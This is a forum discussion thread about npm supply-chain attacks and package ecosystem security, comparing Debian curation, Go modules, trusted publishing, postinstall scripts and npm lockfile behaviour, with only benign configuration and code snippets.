To be clear, Debian does not audit code like you might be suggesting they do. There are checks for licensing, source code being missing, build reproducibility, tests and other things. There is some static analysis with lintian, but not systematically at the source code level with tools like cppcheck or rust-analyzer or similar. Auditing the entirety of the code for security issues just isn't feasible for package maintainers. Malware might be noticed while looking for other issues, that isn't guaranteed though, the XZ backdoor wasn't picked up by Debian.
> The general solution is to do what Debian does.
The problem with this approach is that frameworks tend to "expire" pretty quickly, and you can't run anything on Debian for very long before the framework is obsolete. What I mean by obsolete: Debian 13 ships with Golang 1.24; a year from now it's gonna be Golang 1.26, and that is not being made available in trixie. So you have to find an alternative source for the latest golang deb. Same with PHP, Python etc. If you run them for 3 years with no updates, just some security fixes here and there, you're gonna wake up in a world of hurt when the next stable release comes out and you have to do en-masse updates that will most likely require huge refactoring because of syntax changes, library changes and so on.
And Javascript is a problem all by itself where versions come up every few months and packages are updated weekly or monthly. You can't run any "modern" app with old packages unless you accept all the bugs or you put in the work and fix them.
I am super interested in a solution for this that provides some security for packages pushed to NPM (the most problematic repository). And for distributions to have a healthy updated ecosystem of packages so you don't get stuck who knows for how long on an old version of some package.
And back to Debian, trixie ships with nginx 1.26.3-3+deb13u1. Why can't they continuously ship the latest stable version if they don't want to use the mainline one?
> Keep a stable distro where new packages aren't added and versions change rarely (security updates and bugfixes only, no new functionality). This is what most people use.
Unfortunately most people don't want old software that doesn't support newer hardware so most people don't end up using Debian stable.
It'd be interesting to see how much of the world runs on Debian containers, where most of the whole "it doesn't support my insert consumer hardware here" argument is completely moot.
I don't know why you went with hardware.
Most people don't want old software because they don't want old software.
They want latest features, fixes and performance improvements.
What hardware isn't supported by Debian stable that is supported by unstable?
Or is this just a "don't use Linux" gripe?
I haven't had many problems before, but Blackwell support was really buggy for the first two weeks.
Enable the Backport sources. The recent kernels there have supported all my modern personal devices.
> Unfortunately most people don't want old software
"old" is a strange way to spell "new, unstable, and wormed".
I want old software. Very little new features are added to most things i care about, mostly it is just bloat, AI slop, and monthly subscription shakedowns being added to software today.
So, who is going to audit the thousands of new packages/versions that are published to npm every day? It only works for Debian because they hand-pick popular software.
Maybe NPM should hand pick popular packages and we should get away from this idea of every platform should always let everyone publish. Curation is expensive, but it may be worthwhile for mature platforms.
This is maybe where we could start getting into money into the opensource ecosystems.
One idea I've had is that publishing is open as today, but security firms could offer audit signatures.
So a company might pay security firms and only accept updates to packages that have been audited by 1, 2, 3 or more of their paid services.
Thus money would be paid in the open to have eyes on changes for popular packages and avoid the problem of that weird lone maintainer in northern Finland being attacked by the Chinese state.
Errr, you! If you brought in the dependency, it is now your job to maintain it and diff every update for backdoors.
I've been arguing a couple of times that the 2 main reasons people want package management in languages are
1. Using an operating system with no package management
2. Poor developer discipline, i.e. developers always trying to use the latest version of a package.
So now we have lots of poorly implemented language package managers, docker containers on top being used as another package management layer (even though that's not their primary purpose, many people use them like that), and the security implications of pulling in lots of random dependencies without any audit.
Developing towards a stable base like Debian would not be a panacea, but it would alleviate the problems by at least placing another audit layer in between.
Nope. It's because:
1. You don't want to tie your software to the OS. Most people want their software to be cross-platform. Much better to have a language-specific package manager because I'm using the same language on every OS. And when I say "OS" here, I really mean OS or Linux distro, because Linux doesn't have one package manager.
2. OS package managers (where they even exist), have too high a bar of entry. Not only do you have to make a load of different packages for different OSes and distros, but you have to convince all of them to accept them. Waaay too much work for all but the largest projects.
You're probably going to say "Good! It would solve this problem!", but I don't think the solution to package security is to just make it so annoying nobody bothers. We can do better than that.
I actually agree that in the context of user software people often want the latest, and that Windows and macOS not having proper package management is an issue.
However, we are talking in the context of NPM packages, the vast majority of which would be running inside a container on some server. So why couldn't that software use a stable Debian base, for example?
And arguing that package management is too complicated is a bit ridiculous considering how many workloads are running in docker containers, which I'd argue are significantly more complex.
It doesn't matter if the operating system I personally use has a good package manager, I need to release it in a form that all the people using it can work with. There are a lot of OSes out there, with many package managers.
Even if we make every project create packages in every package manager, it still wouldn't add any auditing.
Exactly, in a way Debian (or any other distro) is an extended standard library.
Yeah, after seeing all of the crazy stuff that has been occurring around supply chain attacks, and realizing that latest Debian stable (despite the memes) already has a lot of decent relatively up-to-date packages for Python, it's often easier to default to just building against what Debian provides.
Right. Like NPM, Debian also supports post-install hooks for its packages. Not great (ask Michael Stapelberg)! But this is still a bit better than the NPM situation because at least the people writing the hooks aren't the people writing the applications, and there's some standards for what is considered sane to do with such hooks, and some communal auditing of those hooks' behavior.
Linux distros could still stand to improve here in a bunch of ways, and it seems that a well-designed package ecosystem truly doesn't need such hooks at the level of the package manager at all. But this kind of auditing is one of the useful functions of downstream software distros for sure.
Pretty unfeasible with the variety of packages/ecosystems that get created. You'd either end up requiring a LOT of dev time looking over packages on the maintainer end, or basically having no packages people need to use in your repository.
Finding the balance of that seems to me like it'd be incredibly difficult.
> NPM, Python, Rust, Go, Ruby all suffer from this problem, because they have centralized and open package repositories
Can you point me to Go's centralized package repository?
That's a doc site and a pull-through cache, neither is a package repository
git isn't centralized nor a package repository
For what it's worth, our code is on GitLab
Github is a centralized repository where the overwhelming majority of Go libraries are hosted.
So GitHub is every single programming language's centralized package repository?
Then what's the difference between git and npm, cargo, pypi, mvn et al?
Git != Github.
In practice, little difference between Go's use of Github and Python's use of PyPI. Someone at Microsoft with root access could compromise everyone.
> Git != Github
That's why I'm putting emphasis on it, because to Go it is.
And to languages that actually have centralized package repositories it isn't. There is a difference between code and packages, and Go simply does not have the latter in the traditional sense: what Go calls a package is a collection of source files in the same directory that are compiled together within a module, and a module is a collection of packages (again, code) that are released, versioned, and distributed together. Modules may be downloaded directly from version control repositories or via proxy servers.
To the other languages mentioned above, packages may have binaries, metadata and special script hooks. There is a package manager like pip, cargo or npm, and if you want to install one, you won't have to specify a URL because there is a canonical domain to go to.
Go just knows code and it'll use git, hg or even svn. And if you want to claim that lots of open-source code being on GitHub makes it special, then
> GitHub is every single programming language's centralized package repository
and
> Someone at Microsoft with root access could compromise every user of every single programming language
I think you're being silly to be so insistent about this. 95% of Go packages are hosted on Github, a centralized hosting platform. The fact that they install via the git protocol (or do they? do they just use https to check out?) is immaterial.
95% of Python packages are installed from PyPI, but just like Go can also install from non-Github sources, Python supports installing from other non PyPI indexes[0] or even from a Git repository directly[1] like Go.
> what Go calls a package is a collection of source files in the same directory
What is it that you imagine Python or NPM packages consist of? Hint: A Python .whl file is just a folder in a zip archive (Python also supports source distributions directly analogous to Go)
[0] https://docs.astral.sh/uv/concepts/indexes/
[1] https://thelinuxcode.com/install-git-repository-branch-using...
> 95% of Go packages[=code, the author] are hosted on Github
So "GitHub is every single programming language's centralized package repository, because lots of code is hosted there" ?
> 95% of Python packages are installed from PyPI, but just like Go can also install from non-Github sources, Python supports installing from other non PyPI indexes[0] or even from a Git repository directly[1] like Go.
And yet there is a clear difference between source distributions and pip/npm/rubygem/cargo packages - and between tooling/ecosystems that ONLY support the former and those that MAY use either and unfortunately mostly use the latter.
> What is it that you imagine Python or NPM packages consist of?
Something like a script that runs as part of the package that downloads a tarball, modifies package.json, injects a local bundle.js and runs npm publish (see this post). Usually also hosted at the default, centralized, authoritative source run by the maintainers of the package management tool.
But I'm repeating myself.
> (or do they? do they just use https to check out?)
Maybe try it out or read the docs first.
I'm closing with this:
> NPM, Python, Rust, Go, Ruby all suffer from this problem, because they have centralized and open package repositories.
is either wrong or disingenuously misleading: depending on how you slice your definitions, it applies either to nothing or to every single thing. It does not hold any water; that is my entire argument.
k, let me know how your CI pipeline fares the next time there's a Github outage and we can revisit this discussion of Go's fantastic uniquely decentralized dependency management.
You really ought to research a topic before arguing.
For the average user, both GitHub and the default $GOPROXY would have to be down. For me, my CI runs where my code (and the code I've cloned) lives: self-hosted GitLab.
Oh my god, you've figured out caching!? Will wonders never cease! Truly, Golang is the ecosystem of the future free from all centralized dependencies.
In practice, my experience is that this ends up with only old versions of things in the stable package repos. So many times I run into a bug, and then find out that the bug has been fixed in a newer version but it isn't updated in the stable repo. So now you end up pulling an update out of band, and you are in the same boat as before.
I don't know how you avoid this problem
You're overestimating the amount of auditing these distros do for the average package; in reality there is very little.
The reason these compromised packages typically don't make it in to e.g. Debian is because this all tends to be discovered quite quickly, before the package maintainer has a chance to update it.
> security updates and bugfixes only
Just wondering: while this is less of an attack surface, it's still a surface?
The NX NPM attack (at least the previous wave, which targeted tinycolor) relied on running post-install scripts. Go tooling does not give you ways to run post-install scripts, which is a much more reasonable approach.
> The general solution is to do what Debian does.
If you ask these people, distributions are terrible and need to die.
Python even removed PGP signatures from Pypi because now attestation happens by microsoft signing your build on the github CI and uploading it directly to pypi with a never expiring token. And that's secure, as opposed to the developer uploading locally from their machine.
In theory it's secure because you see what's going in there on git, but in practice github actions are completely insecure so malware has been uploaded this way already.
For python I use Debian packages wherever possible. What I need is in there usually. I might even say almost always.
Go’s package repository is just GitHub.
At the end of the day, it’s all a URL.
You’re asking for a blessed set of URLs. You’d have to convince someone to spend time maintaining that.
As hair splitting, that's actually not true: Go's package manager is just version control, of which GitHub is currently the most popular host. And it also allows redirecting to your own version control via `go mod edit -replace`, which leaves the source-code reference to GitHub intact but will install it from wherever you like.
How does that relate to the bigger conversation here? Are you suggesting people stop pulling Go packages from GitHub and only use local dependencies?
I wasn't trying to relate anything to the bigger conversation, I just meant to draw attention to the fact that GitHub is not golang's package manager
That said, I would guess the 'bigger conversation' is that it is much harder to tpyo <<import "github.com/DataaDog/datadog-api-client-go/v2/api/datadogV2">> than $(npm i dataadog) or similar in a "flat" package namespace (same for its $(uv pip install dataadog) friend)
None of those cited ones fix the dependency lineage issue, proving that release 1.1 was authored by the same chain of custody as release 1.0 of any given package. One can opt in to gpg verified dependencies in Maven, but it is opt-in. The .jar artifacts can also be cryptographically signed, but the risk that's trying to drive down is tamperproofing and not lineage, AFAIK
Golang at least gives you the option to easily vendor-ize packages to your local repository. Given what has happened here, maybe we should start doing this more!
This doesn't really help you. I assume Go records the sha1 hash of the commit it grabs, so it doesn't really matter if you vendor it, or download it every time.
The problem comes when you want to upgrade your dependencies. How do you know that they are trustworthy on first use?
Go uses the hash of the source code, not the commit ID. So there's no difference between vendoring and using the central repo.
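For what it's worth, a minimal sketch of the vendoring workflow being discussed, using only standard Go tooling:

    go mod vendor                 # copy the exact dependency sources into ./vendor
    go mod verify                 # check that downloaded modules haven't been modified since download
    go build -mod=vendor ./...    # build only from the vendored copies

Since Go 1.14 the vendor directory is used automatically when it exists, so the -mod=vendor flag is mostly explicit documentation. Either way, the trust-on-first-use problem described above remains: vendoring pins what you got, it doesn't tell you whether what you got was good.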
npm has always downloaded to the current directory.
That isn't the same as vendor-izing unless you are committing node_modules to your VCS, which would be insane.
The problem with your idea is that you need to find the person who wants to do all this auditing of every version of Node/Python/Ruby libraries.
I believe good centralized infrastructure for this would be a good start. It could be "gamified", and reviewers could earn reputation for reviewing packages; common packages would be reviewed all the time.
Kinda like Stackoverflow for reviews, with optional identification and such.
And honestly an LLM can strap a "probably good" badge on things with cheap batch inference.
Decentralised auditing is what is needed.
> suffer from this problem
Benefit from this feature.
I'm coming to the unfortunate realization that supply chain attacks like this are simply baked into the modern JavaScript ecosystem. Vendoring can mitigate your immediate exposure, but does not solve this problem.
These attacks may just be the final push I needed to take server rendering (without js) more seriously. The HTMX folks convinced me that I can get REALLY far without any JavaScript, and my apps will probably be faster and less janky anyway.
Traditional JS is actually among the safest environments ever created. Every day, billions of devices run untrusted JS code, and no other platform has seen sandboxed execution at such scale. And in nearly three decades, there have been very few incidents of large successful attacks on browser engines. That makes the JS engine derived from browsers the perfect tool to build a server side framework out of.
However, processes and practices around NodeJS and npm are in dire need of a security overhaul. leftpad is a cultural problem that needs to be addressed. To start with, snippets don't need to be on npm.
Sandboxing doesn't do any good if the malicious code and target data are in the same sandbox, which is the whole point of these supply-chain attacks.
I think the sandbox they're talking about is the browser, not the server (which runs node).
But if we think about a release publishing chain like a BSD process separation, why do they have to be?
Sure, there will be a step/stage that will require access to NPM publish credentials to publish to NPM. But why does this stage need to execute any code except a very small footprint of vetted code? It should just pick up a packaged, signed binary and move it to NPM.
The compilation/packaging step on the other hand doesn't need publishing rights to NPM. Ideally, it should only get a filesystem with the sources, dependencies and a few shared libraries and /sys or /proc dependencies it may need to function. Why does some dependency downloading need access to your entire filesystem? Maybe it needs some allowed secrets, but eh.
It's certainly a lot of change into existing pipelines and ideas, and it's certainly possible to poke holes into there if you want things to be easy. But it'd raise the bar quite a bit.
I mean, what would do any good if your supply chain is attacked?
That said, fewer potential vendors supplying packages 'may' reduce exposure, but it doesn't remove it.
Either way, not running the bleeding edge packages unless it's a known security fix seems like a good idea.
The supply chain infrastructure needs to stop being naive and allowing for insecure publishing.
- npm should require 2FA and disallow tokens for publishing. This is an option, but it should be a requirement.
- npm should require using a trusted publisher and provenance for packages with over 100k downloads a week, and for their dependencies.
- GitHub should require a 2FA step for automated publishing
- npm should add a cool-down period where it won't install brand-new packages without a flag
- npm should stop running postinstall scripts. (You can already opt out of these locally; see the sketch after this list.)
- npm should have an option to not install packages without provenance.
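For the postinstall and provenance points, some of this can already be opted into locally today rather than waiting for npm to mandate it. A minimal sketch (these are standard npm options; the policy around them is up to you):

    npm config set ignore-scripts true   # never run install/postinstall lifecycle scripts
    npm ci --ignore-scripts              # or opt out per invocation in CI
    npm audit signatures                 # verify registry signatures and provenance attestations

The trade-off is that ignore-scripts also skips legitimate build steps (native addons and the like), so those have to be run explicitly where needed.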
The reality is that for a huge crowd of developers 2FA doesn't do shit.
> Traditional JS is actually among the safest environments ever created.
> However, processes and practices around NodeJS and npm are in dire need of a security overhaul. leftpad is a cultural problem that needs to be addressed. To start with, snippets don't need to be on npm.
Traditional JS is the reason we have all of these problems around NodeJS and npm. It's a lot better than it was, but a lot of JS tooling came up in the time when ES5 and older were the standard, and to call those versions of the language lacking is... charitable. There were tons of things that you simply couldn't count on the language or its standard library to do right, so a culture of hacks and bandaids grew up around it. Browser disparities didn't help either.
Then people said, "Well, why don't we all share these hacks and bandaids so that we don't have to constantly reinvent the wheel?", and that's sort of how npm got its start. And of course, it was the freewheeling days of the late 00s/early 10s, when you were supposed to "move fast and break things" as a developer, so you didn't have time to really check if any of this was secure or made any sense. The business side wanted the feature and they wanted it now.
The ultimate solution would be to stop slapping bandaids and hacks on the JS ecosystem by making a better language but no one's got the resolve to do that.
Python is the other extreme, with an incredibly heavyweight standard library with a built-in function to do just about anything.
E.g. there is a built-in function that takes elements pairwise from a list! That level of minutiae being included feels nuts coming from other languages.
Javascript doesn't have a standard library; until it does, the 170 million[1] weekly downloads of packages like UUID will continue. You can't expect people to re-write everything over and over.
That's not the problem. There is a cultural (and partly technical) aversion in JavaScript to large libraries - this is where the issue comes from. So, instead of having something like org.apache.commons in Java or Boost in C++ or Posix in C, larger libraries that curate a bunch of utilities missing from the standard library, you get an uncountable number of small standalone libraries.
I would bet that you'll find a third party `leftpad` implementation in org.apache.commons or in Spring or in some other collection of utils in Java. The difference isn't the need for 3rd party software to fix gaps in the standard library - it's the preference for hundreds of small dependencies instead of one or two larger ones.
Lodash is a good counterpoint, but it’s falling out of style since the JS runtimes support more basic things now.
JS apps, despite the HN narrative, have a much stronger incentive to reduce bundle/“executable” size compared to most other software, because the expectation is for your web app to “download” nearly instantly for every new user. (Compare to nearly any other type of software, client or server, where that’s not an expectation.)
JS comes with exactly zero tools out of the box to make that happen. You have to go out of your way to find a modern toolchain that will properly strip out dead code and create optimized scripts that are as small as possible.
This means the “massive JS library which includes everything” also depends on having a strong toolchain for compiling code. And while many professional web projects have that, the basic script tag approach is still the default and easiest way to get started… and pulling in a massive std library through that is just a bad idea.
This baseline — the web just simply having different requirements around runtime execution — is part of where the culture comes from.
And because the web browser traditionally didn’t include enough of a standard library for making apps, there’s a strong culture of making libraries and frameworks to solve that. Compare to native apps, where there’s always an official sdk or similar for building apps, and libraries like boost are more about specific “lower level” language features (algorithms, concurrency, data structures, etc) and less about building different types of software like full-blown interactive applications and backend services.
There are attempts to solve this (Deno is probably the best example), but buy-in at a professional level requires a huge commitment to migrate and change things, so there’s a lot of momentum working against projects like that.
1000% agree. Javascript is weak in this regard if you compare it to major programming languages. It just adds unnecessary security risks not to have built-in support in the language for common things like making outbound API calls or parsing JSON, for example.
It does have functions for that, “fetch” and “JSON.parse,” available in most JS runtimes.
> You can't expect people to re-write everything over and over.
Call me crazy but I think agentic coding tools may soon make it practical for people to not be bogged down by the tedium of implementing the same basic crap over and over again, without having to resort to third party dependencies.
I have a little pavucontrol replacement I'm walking Claude Code through. It wanted to use pulsectl but, to see what it could do, I told it no. Write your own bindings to libpulse instead. A few minutes later it had that working. It can definitely write crap like leftpad.
FYI, there's crypto.randomUUID()
That's built in to server side and browser.
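A minimal example, for reference (the global is available in browsers and recent Node; older Node versions can import it from node:crypto):

    import { randomUUID } from 'node:crypto';  // in browsers: crypto.randomUUID()

    const id = randomUUID();  // RFC 4122 version 4 UUID string
    console.log(id);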
You have the DOM and Node APIs, which I think cover more than the C standard library or the Common Lisp library. Adding direct dependencies is done by every project. The issue is the sprawling deps tree of NPM and JS culture.
> You can't expect people to re-write everything over and over.
That’s the excuse everyone is giving, then you see thousands of terminal libraries and calendar pickers.
It's a waste of time to strictly vet dependencies on my side when adding the standard test runner by Meta - jest - alone adds 300 packages to my dependency graph.
So yes, the sprawling deps tree and culture is the problem. We would need to start reducing dependencies of the basic tools first. Otherwise it seems rather pointless to bother app developers with reducing dependencies.
When I was learning JS/node/npm as a total programming newbie, a lot of the advice online was basically “if you write your own version of foobar when foobar is already available as an npm package, you’re stupid for wasting your time”.
I’d never worked in any other ecosystem, and I wish I realized that advice was specific to JS culture
It's not really bad advice, it just has different implications in Javascript.
In other languages, you'd have a few dependencies on larger libraries providing related functionality, where the Javascript culture is to use a bunch of tiny libraries to give the same functionality.
Sometimes I wonder how many of these tiny libraries are just the result of an attempt to have something ready for a conference talk and no one had the courage to say "Uh, Chris, that already exists, and the world doesn't need your different approach on it."
None of those security guarantees matter when you take out the sandbox, which is exactly what server-side JS does.
The isolated context is gone and a single instance of code talking to an individual client has access to your entire database. It’s a completely different threat model.
So maybe the solution would be to sandbox Node.js?
I'm not quite sure what that would mean, but if it solves the problem for browsers, why not for server?
You can't sandbox the code that is supposed to talk to your DB from your DB.
And even on client side, the sandboxing helps isolate any malicious webpage, even ones that are accidentally malicious, from other webpages and from the rest of your machine.
If malicious actors could get gmail.com to run their malicious JS on the client side through this type of supply-chain attack, they could very very easily steal all of your emails. The browser sandbox doesn't offer any protection from 1st party javascript.
Deno does exactly that.
But in practice, to do useful things server-side you generally need quite a few permissions.
I think the smallest C library I've seen was a single file to include in your project if you want terminal control like curses on Windows. A lot of libraries on npm (and cargo) should be a gist or a blog post.
Interestingly, AI should be able to help a lot with the desire to just inline those snippets.
What I'm wondering is whether it would help the ecosystem if you were able to load raw snippets into your codebase and source control, as opposed to having them as dependencies.
So e.g. the shadcn component-pasting approach.
For things like leftPad, cli colors and others you would just load raw typescript code from a source, and you would immediately notice something malicious, either right away or during code reviews.
You would leave actual npm packages to only actual frameworks / larger packages where this doesn't make sense, and expect higher scrutiny and multiple approvals of releases there.
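To make that concrete with the smallest possible example: a helper like leftPad would just live in the repo as ordinary, reviewed source instead of as a dependency (this is an illustrative implementation, not the actual left-pad package):

    // src/utils/left-pad.js - vendored snippet, owned and reviewed like any other code
    export function leftPad(value, length, padChar = ' ') {
      const str = String(value);
      if (str.length >= length) return str;
      return padChar.repeat(length - str.length) + str;
    }

A malicious change to something this small would stick out immediately in a diff, which is the whole point.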
> I'm coming to the unfortunate realizattion that supply chain attacks like this are simply baked into the modern JavaScript ecosystem.
I see this odd take a lot - the automatic narrowing of the scope of an attack to the single ecosystem it occurred in most recently, without any real technical argument for doing so.
What's especially concerning is I see this take in the security industry: mitigations put in place to target e.g. NPM, but are then completely absent for PyPi or Crates. It's bizarre not only because it leaves those ecosystems wide open, but also because the mitigation measures would be very similar (so it would be a minimal amount of additional effort for a large benefit).
Could you say more about what mitigations you’re thinking of?
I ask because think the directionality is backwards here: I’ve been involved in packaging ecosystem security for the last few years, and I’m generally of the opinion that PyPI has been ahead of the curve on implementing mitigations. Specifically, I think widespread trusted publishing adoption would have made this attack less effective since there would be fewer credentials to steal, but npm only implemented trusted publishing recently[1]. Crates also implemented exactly this kind of self-scoping, self-expiring credential exchange ahead of npm.
(This isn’t to malign any ecosystem; I think people are also overcorrect in treating this like a uniquely JavaScript-shaped problem.)
[1]: https://github.blog/changelog/2025-07-31-npm-trusted-publish...
> PyPI has been ahead of the curve on implementing mitigations
Indeed, crates.io implemented PyPI's trusted publishing and explicitly called out PyPI as their inspiration: https://blog.rust-lang.org/2025/07/11/crates-io-development-...
Most people have addressed the package registry side of NPM.
But NPM has a much, much bigger problem on the client side, that makes many of these mitigations almost moot. And that is that `npm install` will upgrade every single package you depend on to its latest version that matches your declared dependency, and in JS land almost everyone uses lax dependency declarations.
So, an attacker who simply publishes a new patch version of a package they have gained access to will likely poison a good chunk of all of the users of that package in a relatively short amount of time. Even if the projects using this are careful and use `npm ci` instead of `npm install` for their CI builds, it will still easily get developers to download and run the malicious new version.
Most other ecosystems don't have this unsafe-by-default behavior, so deploying a new malicious version of a previously safe package is not such a major risk as it is in NPM.
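To illustrate what lax declarations mean in practice: the caret ranges npm writes by default accept any future minor or patch release, so a freshly published malicious patch satisfies the constraint (the package name and versions here are made up):

    {
      "dependencies": {
        "some-color-lib": "^4.1.0"
      }
    }

That range matches 4.1.1, 4.2.0 and anything else below 5.0.0, so wherever the lockfile doesn't pin the resolution (or gets regenerated), a just-published 4.1.2 is pulled in automatically.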
> in JS land almost everyone uses lax dependency declarations
They do, BUT.
Dependency versioning schemes are much more strictly adhered to within JS land than in other ecosystems. PyPi is a mishmash of PEP 440, SemVer, some packages incorrectly using one in the format of the other, & none of the 3 necessarily adhering to the standard they've chosen. Other ecosystems are even worse.
Also - some ecosystems (PyPi again) are committing far worse offences than lax versioning - versionless dependency declaration. Heavy reliance on requirements.txt without lockfiles where half the time version isn't even specified at all. Astral/Poetry are improving the situation here but things are still bad.
Maven land is full of plugins with automated pom.xml version templating that has effectively the same effect as lax versioning, but without any strict adherence to any kind of standard like semver.
Yes, the situation in JS land isn't great, but there are much worse offenders out there.
The point is still different. In PyPI, if I put `requests` in my requirements.txt, and I run `pip install -r requirements.txt` every time I do `make build`, I will still only get one version of requests - the latest available the first time I installed it. This severely reduces the attack radius compared to NPM's default, where I would get the latest (patch) version of my dependency every day. And the ecosystem being committed to respecting semver is entirely irrelevant to supply chain security. Malicious actors don't care about semver.
Overall, publishing a new malicious version of a package is a much lesser problem in virtually any ecosystem other than NPM; in NPM, it's almost an automatic remote code execution vulnerability for every NPM dev, and a persistent threat for many NPM packages even without this.
> This severely reduces the attack radius compared to NPM's default, where I would get the latest (patch) version of my dependency every day.
By default npm will create a lock file and give you the exact same version every time unless you manually initiate an upgrade. Additionally you could even remove the package-lock.json and do a new npm install and it still wouldn't upgrade the package if it already exists in your node_modules directory.
Only time this would be true is if you manually bump the version to something that is incompatible, or remove both the package-lock.json and your node_modules folder.
Ahh this might explain the behavior I observed when running npm install from a freshly checked out project where it basically ignored the lock file. If I recall in that situation the solution was to run an npm clean install or npm ci and then it would use the lock file.
Generally you have the right of it, but a word of caution for Pythonistas:
> The point is still different. In PyPI, if I put `requests` in my requirements.txt, and I run `pip install -r requirements.txt` every time I do `make build`, I will still only get one version of requests - the latest available the first time I installed it.
Only because your `make build` is a custom process that doesn't use build isolation and relies on manually invoking pip in an existing environment.
Ecosystem standard build tools (including pip itself, using `pip wheel` — which really isn't meant for distribution, but some people seem to use it anyway) default to setting up a new virtual environment to build your code (and also for each transitive dependency that requires building — to make sure that your dependencies' build tools aren't mutually incompatible, or broken by other things in the envrionment). They will read `requests` from `[project.dependencies]` in your pyproject.toml file and dump the latest version in that new environment, unless you use tool-specific configuration (or of course a better specification in pyproject.toml) to prevent that. And if your dependencies were only available as sdists, the build tool would even automatically, recursively attempt to build those, potentially running arbitrary code from the package in the process.
> every time I do `make build`
I'm going to assume this is you running this locally to generate releases, presumably for personal projects?
If you're building your projects in CI you're not pulling in the same version without a lockfile in place.
> Maven land is full of plugins with automated pom.xml version templating that has effectively the same effect as lax versioning, but without any strict adherence to any kind of standard like semver.
Please elaborate on this. I'm a long-time Java developer and have never once seen something akin to what you're describing here. Maven has support for version ranges but in practice it's very rarely used. I can expect a project to build with the exact same dependencies resolved today and in six months or a year from now.
I'm not a Java (nor Kotlin) developer - I've only done a little Java project maintenance & even less Kotlin - I've mainly come at this as a tooling developer for dependency management & vulnerability remediation. But I have seen a LOT of varied maven-managed repos in that line of work (100s) and the approaches are widely varied.
I know this is possible with custom plugins but I've mainly just seen it using maven wrapper & user properties.
There are things that are potentially possible, such as templating pom.xml build files or adjusting dependencies based on user properties (is that what you're suggesting?), but what you're describing is definitely not normal or best practice in the ecosystem and shouldn't be presented as if it's normal practice.
`npm install` uses a lockfile by default and will not change versions. No, not transitives either. You would have to either manually change `package.json` or call `npm update`.
You'd have to go out of your way to make your project as bad as you're describing.
A lot of people use tools like Dependabot which automates updates to the lockfile.
That's unrelated to this.
As well, both Dependabot and Renovate run in isolated environments without secrets or privileges, need to be manually approved, and can enforce minimum publication ages before recommending a package update, to prevent basic supply chain attacks or lockfile corruption from a pinned package version being de-published (up to a 3 day window on NPM).
No, this is just wrong. It might indeed use package-lock.json if it matches your node_modules (so that running `npm install` multiple times won't download new versions). But if you're cloning a repo off of GitHub and running npm install for the first time (which a CI setup might do), it will take the latest deps from package.json and update the package-lock.json - at least this is what I've found many responses online claim. The docs for `npm ci` also suggest that it behaves differently from `npm install` in this exact respect:
> In short, the main differences between using npm install and npm ci are:
> The project must have an existing package-lock.json or npm-shrinkwrap.json.
> If dependencies in the package lock do not match those in package.json, npm ci will exit with an error, instead of updating the package lock.
Well but the docs you cited don't match what you stated. You can delete node_modules and reinstall, it will never update the package-lock.json, you will always end up with the exact same versions as before. The package-lock updating happens when you change version numbers in the package.json file, but that is very much expected! So no, running npm install will not pull in new versions randomly.
The internet disagrees. NPM will gladly ignore and update lock files. There may exist a way to actually respect lock files, but the default mode of operation does not work as you would naively expect.
- NPM Install without modifying the package-lock.json https://www.mikestreety.co.uk/blog/npm-install-without-modif...
- Why does "npm install" rewrite package-lock.json? https://stackoverflow.com/questions/45022048/why-does-npm-in...
- npm - How to actually use package-lock.json for installing based on locked versions? https://stackoverflow.com/questions/47480617/npm-how-to-actu...
1. This guy clearly doesn't know how NPM works. Don't use `--no-save` regularly or you'll be intentionally desyncing your lockfile from reality.
2&3. NPM 5 had a bug almost a decade ago. They literally link to it in both of those pages. Here[^1] is a developer repeating how I've said it's supposed to work.
It would have taken you less work to just try this in a terminal than search for those "citations".
[^1]: https://github.com/npm/npm/issues/17979#issuecomment-3327012...
Those stackoverflow posts are ancient and many major npm releases old, so in other words: irrelevant. That blog post is somewhat up to date but also very vague about the circumstances which would update the lockfile. Which certainly isn't that npm install updates dependencies to newer versions within the semver range, because it absolutely does not.
Literally just try it yourself?
The way you describe it working doesn't even pass a basic "common sense" check. Just think about what you're saying: despite having a `package-lock.json`, every developer who works on a project will get every dependency updated every time they clone it and get to work?
The entire point of the lockfile is that installations respect it to keep environments agreed. The only difference with `clean install` is that it removes `node_modules` (no potential cache poisoning) and non-zero exits if there is a conflict between `package.json` and `package-lock.json`.
`install` will only update the lockfile where the lockfile conflicts with the `package.json` to allow you to make changes to that file manually (instead of via `npm` commands).
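Put differently, and to the best of my reading of the current npm docs:

    npm ci        # install exactly what package-lock.json records; error if it conflicts
                  # with package.json; start from a clean node_modules every time
    npm install   # resolve against package.json, keep lockfile entries that still satisfy
                  # the declared ranges, and rewrite the lockfile only when they don't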
That's not true. npm ci will never pull in versions newer than your lock file.
I agree other repos deserve a good look for potential mitigations as well (PyPI too, has a history of publishing malicious packages).
But don't brush off the "special status" of NPM here. It is unique in that, JS being the language of both front-end and back-end, it is much easier for the crooks to sneak in malware that will end up running in a visitor's browser and affect them directly. And that makes it a uniquely more attractive target.
npm in itself isn't special at all, maybe the userbase is but that's irrelevant because the mitigation is pretty easy and 99.9999% effective, works for every package manager and boils down to:
1- thoroughly and fully analyze any dependency tree you plan to include
2- immediately freeze all its versions
3- never update without very good reason or without repeating 1 and 2
in other words: simply be professional, face logical consequences if you aren't. if you think one package manager is "safer" than others because magic reasons odds are you'll find out the hard way sooner or later.
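For step 2, npm already has the knobs (these are standard npm options):

    npm config set save-exact true   # record exact versions instead of ^ranges when adding deps
    npm ci                           # reproduce exactly what the lockfile pins, nothing newer

None of that solves step 1, of course; it just makes sure step 1 only has to be repeated when you deliberately choose to update.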
Your item #1 there may be simple, but that's not the same as being easy.
agreed, bad wording. it so happens though that sw development includes many problems and practices that aren't easy and are still part of the job.
Do tell: how many packages are in your dependency graph?
I bet it's hundreds.
Jest alone adds 300 packages.
Consequently I doubt that you in fact "thoroughly and fully" analyzed all your dependencies.
Unless what you're shipping is something other than a feature-rich app, what you proposed seems entirely unrealistic.
Good luck with nr 1 in the js ecosystem and its 30k dependencies 50 branches deep per package
As an outsider looking in, as I don't deal with NPM on a daily basis, the 30k dependencies going 50 branches deep seems to be the real problem here. Code reuse is an admirable goal, but this seems absurd. I have no idea if these numbers are correct or exaggerations, but from my limited time working with NPM a year or two ago it seems like a definite problem.
I'm in the C ecosystem mostly. Is one NPM package the equivalent of one object file? Can NPM packages call internal functions for their dependencies instead of relying so heavily on bringing in so many external ones? I guess it's a problem either way, internal dependencies having bugs vs supply chain attacks like these. Doesn't bringing in so many dependencies lead to a lot of dead code and much larger codebases then necessary?
> Is one NPM package the equivalent of one object file?
No. The closest thing to a package (on almost every language) is an entire library.
